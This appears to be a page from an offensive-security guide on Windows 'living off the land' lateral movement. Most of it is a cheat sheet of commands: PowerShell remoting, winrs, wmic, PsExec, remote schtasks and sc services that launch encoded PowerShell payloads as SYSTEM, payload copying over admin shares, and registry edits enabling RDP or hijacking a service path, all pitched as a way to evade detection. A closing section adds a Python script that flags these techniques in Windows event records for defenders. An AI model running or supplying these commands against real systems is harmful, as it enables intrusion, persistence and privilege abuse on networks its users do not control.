This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Living off the Land (LotL)

Native Windows Tools for Lateral Movement

Purpose: Use legitimate Windows binaries and features to perform lateral movement without deploying additional tools.

Attack Value: Bypass detection, appear as legitimate admin activity, use trusted binaries.

Built-in Windows Remote Tools

PowerShell Remoting

# Enable PowerShell remoting
Enable-PSRemoting -Force

# Remote PowerShell session
$cred = Get-Credential
Enter-PSSession -ComputerName <target-server> -Credential $cred

# Run commands on remote systems
Invoke-Command -ComputerName <target-server> -Credential $cred -ScriptBlock {Get-Process}

# One-liner remote execution
powershell "Invoke-Command -ComputerName <target> -Credential (Get-Credential) -ScriptBlock {whoami}"

Windows Remote Management (WinRM)

# Test WinRM connectivity
winrs -r:<target-server> -u:<username> -p:<password> ipconfig

# Remote command execution
winrs -r:<target-server> -u:<domain>\<username> -p:<password> "powershell Get-Process"

# Interactive session
winrs -r:<target-server> -u:<username> -p:<password> cmd

WMIC Remote Execution

# Remote process execution via WMI
wmic /node:<target-server> /user:<username> /password:<password> process call create "cmd.exe /c whoami > C:\temp\output.txt"

# Query remote system information
wmic /node:<target-server> /user:<username> /password:<password> computersystem get name,domain,model

# Remote service management
wmic /node:<target-server> /user:<username> /password:<password> service where name="Spooler" call startservice

PsExec (Sysinternals)

# Microsoft Sysinternals PsExec
psexec \\<target-server> -u <domain>\<username> -p <password> cmd

# Execute specific commands
psexec \\<target-server> -u <domain>\<username> -p <password> -c local_script.bat

# Copy and execute
psexec \\<target-server> -u <domain>\<username> -p <password> -c -f payload.exe

Scheduled Tasks for Persistence

# Create remote scheduled task
schtasks /create /tn "UpdateTask" /tr "powershell.exe -enc <base64-payload>" /sc onlogon /ru SYSTEM /s <target-server> /u <domain>\<username> /p <password>

# Execute scheduled task
schtasks /run /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password>

# Delete scheduled task
schtasks /delete /tn "UpdateTask" /s <target-server> /u <domain>\<username> /p <password> /f

Service-based Lateral Movement

# Create remote service
sc \\<target-server> create "UpdateService" binPath= "cmd.exe /c powershell.exe -enc <base64-payload>"

# Start remote service
sc \\<target-server> start "UpdateService"

# Delete remote service
sc \\<target-server> delete "UpdateService"

# Using net commands
net use \\<target-server>\ipc$ /user:<domain>\<username> <password>
copy payload.exe \\<target-server>\c$\temp\
sc \\<target-server> create "TempService" binPath= "C:\temp\payload.exe"
sc \\<target-server> start "TempService"

Registry-based Remote Execution

# Enable RDP remotely via registry
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Modify service registry remotely
reg add "\\<target-server>\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<service>" /v ImagePath /t REG_SZ /d "C:\temp\payload.exe" /f
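Each of the techniques above leaves a predictable artifact on the target: a Service Control Manager 7045 event for sc/PsExec service installs, a Security 4698 event for schtasks task creation, and 4688 process-creation events whose parent is the WMI or WinRM host process. The following triage script is an added example for defenders, not part of the original guide; it runs over constructed, flattened event records (the field names are assumed for illustration and are not a real export format, while the event IDs, the PSEXESVC service name and the host-process names are real).

```python
import re

# Constructed sample records in the shape of flattened, exported Windows events.
# Field names are assumed for this example; event IDs are the real Windows ones.
SAMPLE_EVENTS = [
    {"id": 7045, "host": "FS01", "ServiceName": "UpdateService",
     "ImagePath": "cmd.exe /c powershell.exe -enc SQBFAFgA"},
    {"id": 7045, "host": "FS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "host": "FS01", "ServiceName": "gupdate",
     "ImagePath": r"C:\Program Files\Google\Update\GoogleUpdate.exe /svc"},
    {"id": 4698, "host": "FS01", "TaskName": r"\UpdateTask",
     "Command": "powershell.exe", "Arguments": "-enc SQBFAFgA"},
    {"id": 4688, "host": "FS01", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    {"id": 4688, "host": "FS01", "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
]

# powershell followed by any of the encoded-command switch spellings
ENCODED_PS = re.compile(r"powershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)
# Host processes that spawn children for WMI, WinRM/winrs and PsExec remote execution
REMOTE_PARENTS = ("wmiprvse.exe", "wsmprovhost.exe", "psexesvc.exe")

def classify(ev):
    """Return a short finding label for one event, or None if it looks benign."""
    eid = ev.get("id")
    if eid == 7045:  # System log: a new service was installed
        path = ev.get("ImagePath", "")
        if ev.get("ServiceName", "").upper() == "PSEXESVC":
            return "psexec service installed"
        if ENCODED_PS.search(path) or path.lower().startswith("cmd.exe"):
            return "service with encoded/cmd launcher (sc create pattern)"
        if re.search(r"\\temp\\", path, re.I):
            return "service binary staged in temp directory"
    elif eid == 4698:  # Security log: a scheduled task was created
        cmdline = f'{ev.get("Command", "")} {ev.get("Arguments", "")}'
        if ENCODED_PS.search(cmdline):
            return "scheduled task running encoded PowerShell (schtasks pattern)"
    elif eid == 4688:  # Security log: process creation, check the parent
        parent = ev.get("ParentProcessName", "").rsplit("\\", 1)[-1].lower()
        if parent in REMOTE_PARENTS:
            return f"process spawned by remote-execution host {parent}"
    return None

def triage(events):
    """Return (host, event id, label) for every event matching a LotL pattern."""
    findings = []
    for ev in events:
        label = classify(ev)
        if label:
            findings.append((ev["host"], ev["id"], label))
    return findings
```

Run against the sample records it flags the encoded-PowerShell service, the PSEXESVC install, the encoded scheduled task and the WmiPrvSE-spawned cmd.exe, while the vendor updater service and the explorer-spawned cmd.exe pass as benign.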
